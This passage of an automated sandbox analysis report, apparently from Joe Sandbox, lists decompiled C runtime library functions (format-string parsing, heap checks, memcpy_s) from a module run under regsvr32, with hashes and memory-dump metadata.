                                                      • Instruction Fuzzy Hash: E5B12E7260C7C68AE7B1CB24E8457AEB7E4F384785F604126DAD887AA9DB7DD540CF00
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D32260 Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 185COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter
                                                      • String ID: ("Buffer too small", 0)$_vsprintf_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\vsprintf.c$format != NULL$string != NULL && sizeInBytes > 0
                                                      • API String ID: 2123368286-348877268
                                                      • Opcode ID: 2cfb79548520c5644ac56b859ec2257f97161b74a067da09cc3df7a1a7a1eb8b
                                                      • Instruction ID: 912ac3d754b702bf63931d64d46681ea7dc30ff1a731304ef262a69894a36d33
                                                      • Opcode Fuzzy Hash: 2cfb79548520c5644ac56b859ec2257f97161b74a067da09cc3df7a1a7a1eb8b
                                                      • Instruction Fuzzy Hash: 60913A32A0DA4286E7A08B68E84476E77E0F394365F204625E7DD43AF8DB7EE5458F01
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D3BB66 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 137COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: Locale$UpdateUpdate::~_$_invalid_parameter
                                                      • String ID: ("Incorrect format specifier", 0)$(ch != _T('\0'))$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                      • API String ID: 2192614184-4087627024
                                                      • Opcode ID: 129faf18f11d0aee11f016f36c84ee6a14c26cc1d7ed9976eab63fbc1969d985
                                                      • Instruction ID: 0390e2d988dd4d1b4c77dc3c399ba89b4ed25e2388807167c80bf5b266a398b6
                                                      • Opcode Fuzzy Hash: 129faf18f11d0aee11f016f36c84ee6a14c26cc1d7ed9976eab63fbc1969d985
                                                      • Instruction Fuzzy Hash: 95713A72A0D6C286E7F09B24E8947BEB7E4E384345F604126D6CD86AA9DB3ED540CF11
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D30FD0 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 124COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter
                                                      • String ID: dst != NULL$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\memcpy_s.c$memcpy_s$sizeInBytes >= count$src != NULL
                                                      • API String ID: 2123368286-3692278645
                                                      • Opcode ID: 55675c40df69ab8a15ad1ce5aa383a74447e024eaeb1f72783c964e483dda9b8
                                                      • Instruction ID: a0804de238eaeeb3fb2e5788e9c0a34a411087d46cc23648724fab17a52a0f2c
                                                      • Opcode Fuzzy Hash: 55675c40df69ab8a15ad1ce5aa383a74447e024eaeb1f72783c964e483dda9b8
                                                      • Instruction Fuzzy Hash: 0E513C31A1C68686F7A0CB24E8447BE76E5F384344F604136E6CD47AB8DBBEE544CB01
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D2BC30 Relevance: 13.6, APIs: 9, Instructions: 67COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: _free_base_malloc_base
                                                      • String ID:
                                                      • API String ID: 3824334587-0
                                                      • Opcode ID: f253414e3849525c296ec210365ea501a1b810d2bb56cf35f247e52024ae0b7b
                                                      • Instruction ID: 495d8382669efda2ae004298a380b2f700874c64e4d866c5cb6fbd4b09cb9029
                                                      • Opcode Fuzzy Hash: f253414e3849525c296ec210365ea501a1b810d2bb56cf35f247e52024ae0b7b
                                                      • Instruction Fuzzy Hash: AC312D3191D68285E7E49B60EC0437EA3E1F7853A4F214535A6DE466F5CFBEE4809B01
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D263E0 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 143COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter
                                                      • String ID: Bad memory block found at 0x%p.$Bad memory block found at 0x%p.Memory allocated at %hs(%d).$_CrtMemCheckpoint$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgheap.c$state != NULL
                                                      • API String ID: 2123368286-817335350
                                                      • Opcode ID: 3b86e21d312907f031a9c3af8c0eef3d8af61768b64ebe8bc9406c081913c3b7
                                                      • Instruction ID: bdf1888ae082cb337f1151e8154f2efa45ef3de29dcf6e6b26155e3a2b634fb1
                                                      • Opcode Fuzzy Hash: 3b86e21d312907f031a9c3af8c0eef3d8af61768b64ebe8bc9406c081913c3b7
                                                      • Instruction Fuzzy Hash: 6461FB36A18B4586EB64CB19E89132E77A0F785794F714126EBCD83BB4CB3ED451CB00
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D2CFF0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 138COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E000007FE7FEF9D2CFF0(intOrPtr _a8) {
				intOrPtr _v24;
				long long _v48;
				long long _v64;
				intOrPtr _t21;

				_a8 = _t21;
				_v48 = 0;
				_v64 = 0;
				_v24 = _a8;
				_v24 = _v24 - 2;
				if (_v24 - 0x14 > 0) goto 0xf9d2d13e;
				goto __rax;
			}







                                                      0x7fef9d2cff0
                                                      0x7fef9d2cff8
                                                      0x7fef9d2d000
                                                      0x7fef9d2d010
                                                      0x7fef9d2d01b
                                                      0x7fef9d2d024
                                                      0x7fef9d2d048

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter
                                                      • String ID: ("Invalid signal or error", 0)$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\winsig.c$raise
                                                      • API String ID: 2123368286-2245755083
                                                      • Opcode ID: 18adc300c2b93f7eab7b819d563e90f5c41814788a4c43fa347d2340d41b98cd
                                                      • Instruction ID: 19b7c93d4736ed7bda32945b1fb5f0ab86c56f1dc684690d029957412a3b2f1f
                                                      • Opcode Fuzzy Hash: 18adc300c2b93f7eab7b819d563e90f5c41814788a4c43fa347d2340d41b98cd
                                                      • Instruction Fuzzy Hash: 8C71E83291C786CAE7A09F58E84476EB7E0F785754F214135E6CA47BA4CB3EE448CB11
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D25AD9 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 77memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: HeapPointerValid
                                                      • String ID: _BLOCK_TYPE_IS_VALID(pHead->nBlockUse)$_CrtCheckMemory()$_CrtIsValidHeapPointer(pUserData)$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgheap.c$L7$LX
                                                      • API String ID: 299318057-1988567080
                                                      • Opcode ID: 449abee572b00c001843884aa05b8e5cdaea28f8affc6eceb55751fcc4bbfe52
                                                      • Instruction ID: 366f9875c4733d956d5456637ee1c03ed06e45eb4220731ed3e90847f50651e0
                                                      • Opcode Fuzzy Hash: 449abee572b00c001843884aa05b8e5cdaea28f8affc6eceb55751fcc4bbfe52
                                                      • Instruction Fuzzy Hash: FB314D36A1874A86EBE48B59E84172E67D1F785784F614036EACD83BB4DB3FD440CB01
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D2C7E9 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 74COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: EncodePointer$_realloc_dbg
                                                      • String ID: f:\dd\vctools\crt_bld\self_64_amd64\crt\src\onexit.c$}
                                                      • API String ID: 429494535-1858280179
                                                      • Opcode ID: 950a78d59f72efd3ce43bd8456283c625fce50364ef15d6a0f5e845d51c15c3f
                                                      • Instruction ID: 6b22acafcb165364cee05dc597c268ac6a46098997f00e2a063c2d8cfde95e66
                                                      • Opcode Fuzzy Hash: 950a78d59f72efd3ce43bd8456283c625fce50364ef15d6a0f5e845d51c15c3f
                                                      • Instruction Fuzzy Hash: D441B836619B8586DA90CB59F88432EB7E4F7C9794F201025EACE43B68DF7ED4958B00
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D3E16F Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 259COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: get_int64_arg
                                                      • String ID: ("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                      • API String ID: 1967237116-734865713
                                                      • Opcode ID: c2425827690f07a93f69eb38b450ff2678cd23c1eb01a19a01dfffa3a40938e6
                                                      • Instruction ID: ca3ec57313c22d844cddba0ccc7478434e3ff2f5ac626f229199dffed11d05c2
                                                      • Opcode Fuzzy Hash: c2425827690f07a93f69eb38b450ff2678cd23c1eb01a19a01dfffa3a40938e6
                                                      • Instruction Fuzzy Hash: 83D1CA72A0CAC686E7B18B55E8407AFB7E0F384355F600126E6DD87AA9DB7DE440CF14
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D3DF8D Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 218COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E000007FE7FEF9D3DF8D(signed short _a1208, signed int _a1412) {

				_a1412 = _a1208 & 0x0000ffff;
				_a1412 = _a1412 - 0x41;
				if (_a1412 - 0x37 > 0) goto 0xf9d3ea2a;
				goto __rax;
			}



                                                      0x7fef9d3df95
                                                      0x7fef9d3dfa6
                                                      0x7fef9d3dfb5
                                                      0x7fef9d3dfdc

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ("Incorrect format specifier", 0)$7$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                      • API String ID: 0-1585035072
                                                      • Opcode ID: 0bf90205098d20be4f4e59ab582b3189e67a2fe65aecfe549d1a450604364a50
                                                      • Instruction ID: 7092a431cc2f14586a5b6039053772aca43f1c1a92c9fb0ada713ca2b75f96be
                                                      • Opcode Fuzzy Hash: 0bf90205098d20be4f4e59ab582b3189e67a2fe65aecfe549d1a450604364a50
                                                      • Instruction Fuzzy Hash: 93B10D7260CAC286E7B1DB55E8417AFB7E0F784356F104026EAC987AA9DB7DE444CF10
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D38350 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 178COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter
                                                      • String ID: (count == 0) || (string != NULL)$(format != NULL)$_vswprintf_helper$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\vswprint.c
                                                      • API String ID: 2123368286-1876092940
                                                      • Opcode ID: 9846629aa5f9262a1bee0fdfcec26bb25970a0f61289143976d8b215326cf8ff
                                                      • Instruction ID: 5b23c079d1b4d794af0cdd69ad2b30100ea5e3abf5a9ef6833dde17c78c07454
                                                      • Opcode Fuzzy Hash: 9846629aa5f9262a1bee0fdfcec26bb25970a0f61289143976d8b215326cf8ff
                                                      • Instruction Fuzzy Hash: 40911E32618B85CAE7A48B15E84476E77E0F384795F208525E6DE87BB4DB3ED444CF01
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D3BE32 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 173COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 84%
                                                      			E000007FE7FEF9D3BE32(signed int _a80, signed int _a696, intOrPtr _a704, char _a972, signed int _a976, void* _a1096) {

				_a972 = _a696 & 0x000000ff;
				if (_a972 == 0x49) goto 0xf9d3beb7;
				if (_a972 == 0x68) goto 0xf9d3bfc0;
				if (_a972 == 0x6c) goto 0xf9d3be76;
				if (_a972 == 0x77) goto 0xf9d3bfcd;
				goto 0xf9d3bfd9;
				if ( *_a1096 != 0x6c) goto 0xf9d3bea7;
				_a1096 = _a1096 + 1;
				asm("bts eax, 0xc");
				goto 0xf9d3beb2;
				_a80 = _a80 | 0x00000010;
				goto 0xf9d3bfd9;
				asm("bts eax, 0xf");
				if ( *_a1096 != 0x36) goto 0xf9d3bf09;
				if ( *((char*)(_a1096 + 1)) != 0x34) goto 0xf9d3bf09;
				_a1096 = _a1096 + 2;
				asm("bts eax, 0xf");
				goto 0xf9d3bfbe;
				if ( *_a1096 != 0x33) goto 0xf9d3bf4c;
				if ( *((char*)(_a1096 + 1)) != 0x32) goto 0xf9d3bf4c;
				_a1096 = _a1096 + 2;
				asm("btr eax, 0xf");
				goto 0xf9d3bfbe;
				if ( *_a1096 == 0x64) goto 0xf9d3bfac;
				if ( *_a1096 == 0x69) goto 0xf9d3bfac;
				if ( *_a1096 == 0x6f) goto 0xf9d3bfac;
				if ( *_a1096 == 0x75) goto 0xf9d3bfac;
				if ( *_a1096 == 0x78) goto 0xf9d3bfac;
				if ( *_a1096 != 0x58) goto 0xf9d3bfae;
				goto 0xf9d3bfbe;
				_a704 = 0;
				goto E000007FE7FEF9D3BB66;
				goto 0xf9d3bfd9;
				_a80 = _a80 | 0x00000020;
				goto 0xf9d3bfd9;
				asm("bts eax, 0xb");
				_a976 = _a696;
				_a976 = _a976 - 0x41;
				if (_a976 - 0x37 > 0) goto 0xf9d3ca31;
				goto __rax;
			}



                                                      0x7fef9d3be3a
                                                      0x7fef9d3be49
                                                      0x7fef9d3be53
                                                      0x7fef9d3be61
                                                      0x7fef9d3be6b
                                                      0x7fef9d3be71
                                                      0x7fef9d3be84
                                                      0x7fef9d3be91
                                                      0x7fef9d3be9d
                                                      0x7fef9d3bea5
                                                      0x7fef9d3beae
                                                      0x7fef9d3beb2
                                                      0x7fef9d3bebb
                                                      0x7fef9d3bed1
                                                      0x7fef9d3bee2
                                                      0x7fef9d3bef0
                                                      0x7fef9d3befc
                                                      0x7fef9d3bf04
                                                      0x7fef9d3bf17
                                                      0x7fef9d3bf28
                                                      0x7fef9d3bf36
                                                      0x7fef9d3bf42
                                                      0x7fef9d3bf4a
                                                      0x7fef9d3bf5a
                                                      0x7fef9d3bf6a
                                                      0x7fef9d3bf7a
                                                      0x7fef9d3bf8a
                                                      0x7fef9d3bf9a
                                                      0x7fef9d3bfaa
                                                      0x7fef9d3bfac
                                                      0x7fef9d3bfae
                                                      0x7fef9d3bfb9
                                                      0x7fef9d3bfbe
                                                      0x7fef9d3bfc7
                                                      0x7fef9d3bfcb
                                                      0x7fef9d3bfd1
                                                      0x7fef9d3bfe6
                                                      0x7fef9d3bff7
                                                      0x7fef9d3c006
                                                      0x7fef9d3c02d

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: Locale$UpdateUpdate::~__invalid_parameter
                                                      • String ID: ("Incorrect format specifier", 0)$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c$w
                                                      • API String ID: 530996419-3826063230
                                                      • Opcode ID: 6f4341bf75342723462239bb8ed84b432b5f9ccd09e3c394fa39f7378907594f
                                                      • Instruction ID: d6c85ddd6a9fac6d59453cfc6279b165f514207326055716b4e5bf0dd1bf0ecb
                                                      • Opcode Fuzzy Hash: 6f4341bf75342723462239bb8ed84b432b5f9ccd09e3c394fa39f7378907594f
                                                      • Instruction Fuzzy Hash: 0A916F72A0D6C68AE3F08B54E88477EB7E4E385342F601026D7CD87AA9CB7ED5418F11
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D3DDE0 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 173COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 84%
                                                      			E000007FE7FEF9D3DDE0(signed int _a80, signed int _a1208, intOrPtr _a1216, signed int _a1408, signed int _a1412, signed short* _a1544) {

				_a1408 = _a1208 & 0x0000ffff;
				if (_a1408 == 0x49) goto 0xf9d3de66;
				if (_a1408 == 0x68) goto 0xf9d3df6f;
				if (_a1408 == 0x6c) goto 0xf9d3de24;
				if (_a1408 == 0x77) goto 0xf9d3df7c;
				goto 0xf9d3df88;
				if (( *_a1544 & 0x0000ffff) != 0x6c) goto 0xf9d3de56;
				_a1544 =  &(_a1544[1]);
				asm("bts eax, 0xc");
				goto 0xf9d3de61;
				_a80 = _a80 | 0x00000010;
				goto 0xf9d3df88;
				asm("bts eax, 0xf");
				if (( *_a1544 & 0x0000ffff) != 0x36) goto 0xf9d3deb8;
				if ((_a1544[1] & 0x0000ffff) != 0x34) goto 0xf9d3deb8;
				_a1544 =  &(_a1544[2]);
				asm("bts eax, 0xf");
				goto 0xf9d3df6d;
				if (( *_a1544 & 0x0000ffff) != 0x33) goto 0xf9d3defb;
				if ((_a1544[1] & 0x0000ffff) != 0x32) goto 0xf9d3defb;
				_a1544 =  &(_a1544[2]);
				asm("btr eax, 0xf");
				goto 0xf9d3df6d;
				if (( *_a1544 & 0x0000ffff) == 0x64) goto 0xf9d3df5b;
				if (( *_a1544 & 0x0000ffff) == 0x69) goto 0xf9d3df5b;
				if (( *_a1544 & 0x0000ffff) == 0x6f) goto 0xf9d3df5b;
				if (( *_a1544 & 0x0000ffff) == 0x75) goto 0xf9d3df5b;
				if (( *_a1544 & 0x0000ffff) == 0x78) goto 0xf9d3df5b;
				if (( *_a1544 & 0x0000ffff) != 0x58) goto 0xf9d3df5d;
				goto 0xf9d3df6d;
				_a1216 = 0;
				goto E000007FE7FEF9D3DC41;
				goto 0xf9d3df88;
				_a80 = _a80 | 0x00000020;
				goto 0xf9d3df88;
				asm("bts eax, 0xb");
				_a1412 = _a1208 & 0x0000ffff;
				_a1412 = _a1412 - 0x41;
				if (_a1412 - 0x37 > 0) goto 0xf9d3ea2a;
				goto __rax;
			}



                                                      0x7fef9d3dde8
                                                      0x7fef9d3ddf7
                                                      0x7fef9d3de01
                                                      0x7fef9d3de0f
                                                      0x7fef9d3de19
                                                      0x7fef9d3de1f
                                                      0x7fef9d3de32
                                                      0x7fef9d3de40
                                                      0x7fef9d3de4c
                                                      0x7fef9d3de54
                                                      0x7fef9d3de5d
                                                      0x7fef9d3de61
                                                      0x7fef9d3de6a
                                                      0x7fef9d3de80
                                                      0x7fef9d3de91
                                                      0x7fef9d3de9f
                                                      0x7fef9d3deab
                                                      0x7fef9d3deb3
                                                      0x7fef9d3dec6
                                                      0x7fef9d3ded7
                                                      0x7fef9d3dee5
                                                      0x7fef9d3def1
                                                      0x7fef9d3def9
                                                      0x7fef9d3df09
                                                      0x7fef9d3df19
                                                      0x7fef9d3df29
                                                      0x7fef9d3df39
                                                      0x7fef9d3df49
                                                      0x7fef9d3df59
                                                      0x7fef9d3df5b
                                                      0x7fef9d3df5d
                                                      0x7fef9d3df68
                                                      0x7fef9d3df6d
                                                      0x7fef9d3df76
                                                      0x7fef9d3df7a
                                                      0x7fef9d3df80
                                                      0x7fef9d3df95
                                                      0x7fef9d3dfa6
                                                      0x7fef9d3dfb5
                                                      0x7fef9d3dfdc

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: Locale$UpdateUpdate::~__invalid_parameter
                                                      • String ID: ("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c$w
                                                      • API String ID: 530996419-4206863317
                                                      • Opcode ID: ea911f3e0001a33c00663cb6cc71ee2ff701874ce847a4c399e41a1539880d37
                                                      • Instruction ID: 52af39986bd237b596cdecada1f5af7c0900048515ebe490badd59f4da94dd67
                                                      • Opcode Fuzzy Hash: ea911f3e0001a33c00663cb6cc71ee2ff701874ce847a4c399e41a1539880d37
